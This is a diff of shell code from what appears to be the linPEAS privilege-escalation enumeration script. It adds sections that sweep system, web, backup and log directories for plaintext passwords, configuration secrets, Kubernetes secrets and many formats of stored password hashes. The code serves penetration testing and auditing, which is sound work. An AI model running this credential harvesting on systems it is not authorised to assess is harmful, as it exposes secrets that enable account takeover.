+ intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null)
+ else
+ intpwdfiles=$(timeout 150 find $SEARCH_IN_FOLDER -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null)
+ fi
+ printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
+ echo ""
+
+ print_2title "Searching passwords inside key folders (limit 70) - no PHP files"
+ printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
+ echo ""
+
+ ##-- IF) Find possible files with passwords
+ print_2title "Searching possible password variables inside key folders (limit 140)"
+ if ! [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
+ timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
+ else
+ timeout 150 find $SEARCH_IN_FOLDER -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
+ fi
+ wait
+ echo ""
+
+ ##-- IF) Find possible conf files with passwords
+ print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)"
+ if ! [ "$SEARCH_IN_FOLDER" ]; then
+ ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
+ else
+ ppicf=$(timeout 150 find $SEARCH_IN_FOLDER -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
+ fi
+ printf "%s\n" "$ppicf" | while read f; do
+ if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then
+ echo "$ITALIC $f$NC"
+ grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g"
+ fi
+ done
+ echo ""
+fi
+
+fi
+echo ''
+echo ''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
+
+if echo $CHECKS | grep -q api_keys_regex; then
+print_title "API Keys Regex"
+
+if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
+ print_2title "Searching Hashed Passwords"
+print_3title_no_nl "Searching Apr1 MD5 (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Apache SHA (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Blowfish (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Drupal (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Joomlavbulletin (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Linux MD5 (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching phpbb3 (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching sha512crypt (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Wordpress (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
